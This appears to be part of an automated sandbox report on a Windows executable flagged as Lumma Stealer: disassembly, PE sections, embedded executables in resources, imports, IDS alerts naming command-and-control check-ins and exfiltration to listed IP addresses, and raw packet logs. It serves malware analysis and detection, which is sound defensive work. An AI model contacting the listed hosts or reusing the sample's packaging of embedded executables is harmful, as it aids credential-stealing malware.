                                                                                                                            call 00007FBC34AB19FAh
                                                                                                                            call 00007FBC34AB28C9h
                                                                                                                            call 00007FBC34AB403Ch
                                                                                                                            call 00007FBC34ABF1ABh
                                                                                                                            call 00007FBC34AC72F6h
                                                                                                                            call 00007FBC34AD2E99h
                                                                                                                            call 00007FBC34ADD7B8h
                                                                                                                            call 00007FBC34AF09B7h
                                                                                                                            xor eax, eax
                                                                                                                            push ebp
                                                                                                                            push 0049B904h
                                                                                                                            push dword ptr fs:[eax]
                                                                                                                            mov dword ptr fs:[eax], esp
                                                                                                                            push 00000001h
                                                                                                                            call 00007FBC34A5DACEh
                                                                                                                            call 00007FBC34AF36A5h
                                                                                                                            mov eax, 0049B580h
                                                                                                                            push eax
                                                                                                                            push 0049B58Ch
                                                                                                                            mov eax, dword ptr [0049E624h]
                                                                                                                            call 00007FBC34A7C470h
                                                                                                                            call 00007FBC34AF36D3h
                                                                                                                            xor eax, eax
                                                                                                                            pop edx
                                                                                                                            pop ecx
                                                                                                                            pop ecx
                                                                                                                            mov dword ptr fs:[eax], edx
                                                                                                                            jmp 00007FBC34AF399Bh
                                                                                                                            jmp 00007FBC35A5AED4h

                                                                                                                            Data Directories

                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xa00000x2622.idata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xae0000x64400.rsrc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x471d8f80x39c0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0xa40000x18.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                            Sections

                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                            CODE0x10000x9aa880x9ac00ae99869f6d5c9430191b5e1ac5a2ae43False0.5036995784531503data6.621930154722223IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                            DATA0x9c0000x11600x1200dad9cae5d49bb93a2321cc456fdf7b30False0.4505208333333333data4.472841393973581IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            BSS0x9e0000x15000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .idata0xa00000x26220x28006a6036a0f19131189537424c828f6b45False0.36884765625data4.911486635960526IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .tls0xa30000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .rdata0xa40000x180x200f0c87208c92fd0d7fee2e7f2dca8ed20False0.05078125MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                            .reloc0xa50000x8d1c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                            .rsrc0xae0000x644000x644002cc0bb4107afad2cc351cc07f01eb41cFalse0.6245494661783042data7.464731999462781IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                                                            Resources

                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                            RT_CURSOR0xaebf00x134data0.4805194805194805
                                                                                                                            RT_CURSOR0xaed240x134data0.38311688311688313
                                                                                                                            RT_CURSOR0xaee580x134data0.36038961038961037
                                                                                                                            RT_CURSOR0xaef8c0x134data0.4090909090909091
                                                                                                                            RT_CURSOR0xaf0c00x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                                                            RT_CURSOR0xaf1f40x134data0.4642857142857143
                                                                                                                            RT_BITMAP0xaf3280x4e8Device independent bitmap graphic, 48 x 48 x 4, image size 11520.2945859872611465
                                                                                                                            RT_BITMAP0xaf8100xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.521551724137931
                                                                                                                            RT_ICON0xaf8f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5675675675675675
                                                                                                                            RT_ICON0xafa200x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4486994219653179
                                                                                                                            RT_ICON0xaff880x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.4637096774193548
                                                                                                                            RT_ICON0xb02700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.3935018050541516
                                                                                                                            RT_STRING0xb0b180x178data0.7420212765957447
                                                                                                                            RT_STRING0xb0c900x122data0.7103448275862069
                                                                                                                            RT_STRING0xb0db40x170data0.8125
                                                                                                                            RT_STRING0xb0f240x1a8data0.6981132075471698
                                                                                                                            RT_STRING0xb10cc0x124data0.8356164383561644
                                                                                                                            RT_STRING0xb11f00x150data0.7678571428571429
                                                                                                                            RT_STRING0xb13400xf6data0.7642276422764228
                                                                                                                            RT_STRING0xb14380xccdata0.9019607843137255
                                                                                                                            RT_STRING0xb15040xb4data0.8
                                                                                                                            RT_STRING0xb15b80xe8data0.8663793103448276
                                                                                                                            RT_STRING0xb16a00x154data0.7558823529411764
                                                                                                                            RT_STRING0xb17f40x16adata0.8425414364640884
                                                                                                                            RT_STRING0xb19600x3cdata0.6833333333333333
                                                                                                                            RT_STRING0xb199c0x140data0.796875
                                                                                                                            RT_STRING0xb1adc0x142data0.6242236024844721
                                                                                                                            RT_STRING0xb1c200x116data0.7661870503597122
                                                                                                                            RT_STRING0xb1d380xfeAmigaOS bitmap font "\017_\034 %", 15464 elements, 2nd, 3rd0.8464566929133859
                                                                                                                            RT_STRING0xb1e380x68data0.75
                                                                                                                            RT_STRING0xb1ea00xb4data0.6277777777777778
                                                                                                                            RT_STRING0xb1f540xaedata0.5344827586206896
                                                                                                                            RT_RCDATA0xb20040x1800PE32+ executable (console) x86-64, for MS WindowsChineseChina0.3826497395833333
                                                                                                                            RT_RCDATA0xb38040x1000PE32 executable (GUI) Intel 80386, for MS WindowsChineseChina0.36474609375
                                                                                                                            RT_RCDATA0xb48040x5b10PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS WindowsChineseChina0.3255404941660947
                                                                                                                            RT_RCDATA0xba3140x11cDelphi compiled form 'TMainForm'0.7676056338028169
                                                                                                                            RT_RCDATA0xba4300x399Delphi compiled form 'TNewDiskForm'0.5276872964169381
                                                                                                                            RT_RCDATA0xba7cc0x317Delphi compiled form 'TSelectFolderForm'0.5372945638432364
                                                                                                                            RT_RCDATA0xbaae40x2f7Delphi compiled form 'TSelectLanguageForm'0.5704874835309618
                                                                                                                            RT_RCDATA0xbaddc0x5d0Delphi compiled form 'TUninstallProgressForm'0.4576612903225806
                                                                                                                            RT_RCDATA0xbb3ac0x458Delphi compiled form 'TUninstSharedFileForm'0.43345323741007197
                                                                                                                            RT_RCDATA0xbb8040x1fa6Delphi compiled form 'TWizardForm'0.23019007652431497
                                                                                                                            RT_GROUP_CURSOR0xbd7ac0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                            RT_GROUP_CURSOR0xbd7c00x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                            RT_GROUP_CURSOR0xbd7d40x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                            RT_GROUP_CURSOR0xbd7e80x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                            RT_GROUP_CURSOR0xbd7fc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                            RT_GROUP_CURSOR0xbd8100x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                            RT_GROUP_ICON0xbd8240x3edataEnglishUnited States0.8387096774193549
                                                                                                                            RT_VERSION0xbd8640x144dataChineseChina0.5833333333333334
                                                                                                                            RT_MANIFEST0xbd9a80x462XML 1.0 document, ASCII text, with very long lines (1120), with CRLF line terminatorsChineseChina0.4839572192513369

                                                                                                                            Imports

                                                                                                                            DLLImport
                                                                                                                            kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                                                                            user32.dllMessageBoxA
                                                                                                                            oleaut32.dllSafeArrayPutElement, SafeArrayCreate, VariantChangeTypeEx, VariantCopy, VariantClear, SysStringLen, SysAllocStringLen
                                                                                                                            advapi32.dllRegSetValueExA, RegQueryValueExA, RegQueryInfoKeyA, RegOpenKeyExA, RegEnumValueA, RegEnumKeyExA, RegDeleteValueA, RegDeleteKeyA, RegCreateKeyExA, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid
                                                                                                                            kernel32.dlllstrcmpA, WriteProfileStringA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, VirtualFree, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TransactNamedPipe, TerminateThread, TerminateProcess, Sleep, SizeofResource, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesA, SetErrorMode, SetEndOfFile, SetCurrentDirectoryA, RemoveDirectoryA, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileExA, MoveFileA, MapViewOfFile, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExA, LoadLibraryA, IsDBCSLeadByte, IsBadWritePtr, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetWindowsDirectoryA, GetVersionExA, GetVersion, GetUserDefaultLangID, GetTickCount, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryA, GetSystemDefaultLCID, GetShortPathNameA, GetProfileStringA, GetProcAddress, GetPrivateProfileStringA, GetOverlappedResult, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetDriveTypeA, GetDiskFreeSpaceA, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryA, GetComputerNameA, GetCommandLineA, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FlushFileBuffers, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumResourceLanguagesA, EndUpdateResourceA, DeviceIoControl, DeleteFileA, CreateThread, CreateProcessA, CreateNamedPipeA, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CompareFileTime, CloseHandle, BeginUpdateResourceA
                                                                                                                            mpr.dllWNetOpenEnumA, WNetGetUniversalNameA, WNetGetConnectionA, WNetEnumResourceA, WNetCloseEnum
                                                                                                                            version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                            gdi32.dllUnrealizeObject, TextOutA, StretchDIBits, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceA, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetCurrentPositionEx, GetClipBox, GetBitmapBits, ExtFloodFill, ExcludeClipRect, EnumFontsA, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateFontIndirectA, CreateDIBitmap, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceA
                                                                                                                            user32.dllWindowFromPoint, WinHelpA, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenuEx, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowOwnedPopups, ShowCursor, SetWindowRgn, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetCapture, SetActiveWindow, SendNotifyMessageA, SendMessageTimeoutA, SendMessageW, SendMessageA, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClassA, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharBuffA, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRgn, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetSystemMetrics, GetSystemMenu, GetSysColor, GetSubMenu, GetScrollPos, GetPropA, GetParent, GetWindow, GetMessagePos, GetMessageA, GetMenuStringA, GetMenuState, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassInfoW, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, ExitWindowsEx, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableMenuItem, DrawTextW, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreateWindowExA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcW, CallWindowProcA, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuA, CharPrevA, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemBuffA, AdjustWindowRectEx
                                                                                                                            comctl32.dllImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                                                            ole32.dllCoTaskMemFree, CLSIDFromProgID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID
                                                                                                                            oleaut32.dllGetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString
                                                                                                                            shell32.dllShellExecuteExA, ShellExecuteA, SHGetFileInfoA, ExtractIconA
                                                                                                                            shell32.dllSHChangeNotify, SHBrowseForFolder, SHGetPathFromIDList, SHGetMalloc
                                                                                                                            comdlg32.dllGetSaveFileNameA, GetOpenFileNameA
                                                                                                                            ole32.dllCoDisconnectObject
                                                                                                                            advapi32.dllAdjustTokenPrivileges

                                                                                                                            Possible Origin

                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                            EnglishUnited States
                                                                                                                            ChineseChina

                                                                                                                            Network Behavior

                                                                                                                            Suricata IDS Alerts

                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                            2025-01-07T15:26:18.078230+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749726188.114.97.3443TCP
                                                                                                                            2025-01-07T15:26:18.576159+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749726188.114.97.3443TCP
                                                                                                                            2025-01-07T15:26:18.576159+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749726188.114.97.3443TCP
                                                                                                                            2025-01-07T15:26:19.141494+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749732188.114.97.3443TCP
                                                                                                                            2025-01-07T15:26:19.583691+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749732188.114.97.3443TCP
                                                                                                                            2025-01-07T15:26:19.583691+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749732188.114.97.3443TCP
                                                                                                                            2025-01-07T15:26:20.232927+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749742188.114.97.3443TCP
                                                                                                                            2025-01-07T15:26:20.821930+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749742188.114.97.3443TCP
                                                                                                                            2025-01-07T15:26:21.479323+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749749188.114.97.3443TCP
                                                                                                                            2025-01-07T15:26:22.665292+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749760188.114.97.3443TCP
                                                                                                                            2025-01-07T15:26:24.288140+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749772188.114.97.3443TCP
                                                                                                                            2025-01-07T15:26:25.484416+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749779188.114.97.3443TCP
                                                                                                                            2025-01-07T15:26:30.959508+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749816188.114.97.3443TCP
                                                                                                                            2025-01-07T15:26:31.425192+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749816188.114.97.3443TCP
                                                                                                                            2025-01-07T15:26:32.302034+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749823185.161.251.21443TCP

                                                                                                                            Network Port Distribution

                                                                                                                            TCP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Jan 7, 2025 15:26:17.583905935 CET49726443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:17.583970070 CET44349726188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:17.584073067 CET49726443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:17.587498903 CET49726443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:17.587532043 CET44349726188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:18.078116894 CET44349726188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:18.078229904 CET49726443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:18.081257105 CET49726443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:18.081262112 CET44349726188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:18.081666946 CET44349726188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:18.125360012 CET49726443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:18.139390945 CET49726443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:18.139425993 CET49726443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:18.139532089 CET44349726188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:18.576172113 CET44349726188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:18.576281071 CET44349726188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:18.576523066 CET49726443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:18.578061104 CET49726443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:18.578082085 CET44349726188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:18.578094959 CET49726443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:18.578100920 CET44349726188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:18.585243940 CET49732443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:18.585295916 CET44349732188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:18.585395098 CET49732443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:18.585757971 CET49732443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:18.585777044 CET44349732188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:19.141428947 CET44349732188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:19.141494036 CET49732443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:19.143877029 CET49732443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:19.143888950 CET44349732188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:19.144145012 CET44349732188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:19.145802975 CET49732443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:19.145828962 CET49732443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:19.145869970 CET44349732188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:19.583719015 CET44349732188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:19.583792925 CET44349732188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:19.583818913 CET44349732188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:19.583842039 CET49732443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:19.583861113 CET44349732188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:19.583901882 CET49732443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:19.583908081 CET44349732188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:19.584610939 CET44349732188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:19.584661961 CET49732443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:19.584675074 CET44349732188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:19.584863901 CET44349732188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:19.584908962 CET49732443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:19.584916115 CET44349732188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:19.588386059 CET44349732188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:19.588417053 CET44349732188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:19.588442087 CET49732443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:19.588443995 CET44349732188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:19.588454008 CET44349732188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:19.588490963 CET49732443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:19.588495970 CET44349732188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:19.588535070 CET44349732188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:19.588538885 CET49732443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:19.588574886 CET49732443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:19.588691950 CET49732443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:19.588711977 CET44349732188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:19.588721037 CET49732443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:19.588726044 CET44349732188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:19.753062010 CET49742443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:19.753108025 CET44349742188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:19.753211975 CET49742443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:19.753536940 CET49742443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:19.753554106 CET44349742188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:20.232834101 CET44349742188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:20.232927084 CET49742443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:20.234347105 CET49742443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:20.234353065 CET44349742188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:20.234595060 CET44349742188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:20.235862017 CET49742443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:20.236035109 CET49742443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:20.236063957 CET44349742188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:20.821940899 CET44349742188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:20.822033882 CET44349742188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:20.822314024 CET49742443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:20.822374105 CET49742443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:20.822396040 CET44349742188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:20.927736998 CET49749443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:20.927772045 CET44349749188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:20.927840948 CET49749443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:20.928217888 CET49749443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:20.928231955 CET44349749188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:21.479233980 CET44349749188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:21.479322910 CET49749443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:21.480642080 CET49749443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:21.480658054 CET44349749188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:21.480904102 CET44349749188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:21.482192993 CET49749443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:21.482331038 CET49749443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:21.482356071 CET44349749188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:21.482414007 CET49749443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:21.527342081 CET44349749188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:21.995887995 CET44349749188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:21.996015072 CET44349749188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:21.996079922 CET49749443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:22.000313997 CET49749443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:22.000335932 CET44349749188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:22.188751936 CET49760443192.168.2.7188.114.97.3
